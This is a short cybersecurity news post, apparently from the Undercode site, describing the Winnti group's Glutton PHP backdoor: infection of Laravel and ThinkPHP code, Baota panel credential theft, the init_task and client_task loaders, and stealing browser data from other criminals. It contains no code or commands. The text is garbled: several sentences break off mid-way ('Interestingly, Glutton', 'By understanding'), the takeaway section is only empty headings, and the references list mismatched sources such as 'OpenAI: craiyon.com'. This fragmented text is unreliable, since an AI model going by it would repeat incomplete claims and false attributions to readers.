Listen to this Post
2024-12-16
The Winnti group, a notorious cybercrime organization, has unleashed a new weapon: the Glutton backdoor. This PHP-based malware injects malicious code into popular frameworks like Laravel and ThinkPHP, granting attackers persistent control over infected systems. While Glutton boasts sophisticated features, its simplistic design and weak security measures raise questions about its true potential.
Glutton’s Deceptive Feast: Targeting Both Legitimate Businesses and Cybercriminals
Glutton operates through a layered attack strategy. Initially, it infects PHP scripts and business systems, often sold on platforms like Timibbs, with backdoors. This allows remote access and control, primarily targeting victims in China and the US across various industries.
Interestingly, Glutton
A Modular Malware with a Multi-Course Menu
Glutton utilizes a modular design, offering attackers a diverse “menu” of malicious options. It leverages vulnerabilities, weak passwords, and pre-compromised systems for initial infection. Once inside, Glutton injects malicious loaders into PHP files, allowing the deployment of various backdoors, including the Winnti backdoor itself.
These backdoors establish covert communication channels, granting the attackers persistent control. Notably, Glutton uses “task_loader” technology to analyze the environment and choose the most effective method for downloading the next-stage payload.
Unpacking the “Courses”: Winnti Backdoor, Baota Infection, and Framework Injection
The initial “course” served by Glutton is the “init_task” payload. This payload has three main tasks:
1. Installing the Winnti backdoor disguised as a system library for stealth.
2. Infecting Baota control panels, a popular web server management tool, to steal credentials and modify files.
3. Injecting malicious code into popular PHP frameworks like Laravel and ThinkPHP for further payload delivery.
The Baota infection process involves stealing sensitive information and uploading it to the attacker’s server, while the framework injection alters specific code lines to establish communication with the attacker and download additional malware.
The Dessert: Evolving with Obfuscation and Client Backdoors
Glutton continuously evolves. One variant, named “art3,” utilizes a client loader called “client_task.” This loader offers cross-platform compatibility, fileless execution, and potential antivirus evasion through obfuscated code and updated communication infrastructure.
The “client_task” module then uses this client for various purposes:
C2 communication (command and control) via TCP/UDP protocols.
Command execution, allowing attackers to perform 22 different actions, including shell access and file transfer.
Periodic payload retrieval for further malicious functionality.
Black Eats Black: Stealing from the Thieves
Glutton employs a unique tactic called “black eats black.” It utilizes the legitimate tool “HackBrowserData” to extract browser data like passwords and history from other cybercriminals who might be trying to tamper with the backdoored systems.
This creates a layered attack where attackers’ actions are used against them, allowing Glutton’s operators to steal sensitive information and gain an edge.
What Undercode Says:
Winnti’s Glutton backdoor highlights several crucial cybersecurity takeaways:
Supply Chain Attacks:
Multi-Layered Threats:
Evolving Malware:
Black Eats Black Strategies:
By understanding
References:
Reported By: Cyberpress.org
https://www.pinterest.com
Wikipedia: https://www.wikipedia.org
Undercode AI: https://ai.undercodetesting.com
Image Source:
OpenAI: https://craiyon.com
Undercode AI DI v2: https://ai.undercode.help
